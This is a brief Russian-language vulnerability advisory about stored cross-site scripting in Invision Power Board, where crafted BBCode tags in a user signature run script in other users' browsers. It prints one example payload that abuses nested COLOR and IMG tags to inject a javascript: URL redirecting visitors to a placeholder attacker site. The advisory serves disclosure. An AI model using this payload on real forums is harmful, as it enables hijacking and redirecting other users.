Межсайтовый скриптинг в Invision Power Board

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к важным данным других пользователей.

Уязвимость существует из-за некорректной обработки входных данных в некоторых BBCode тегах в подписи. Удаленный пользователь может с помощью специально сформированного тега сохранить злонамеренную подпись, которая будет отображаться в каждом сообщении злоумышленника, и выполнить произвольный HTML сценарий в браузере других пользователей. Пример:

[COLOR=[IMG]http://server/=`image.jpg[/IMG]]`style
=background:url("javascrip t:document.location.replace('http://[attackersite]');")

URL производителя: www.invisionboard.com

Решение: Способов устранения уязвимости не существует в настоящее время.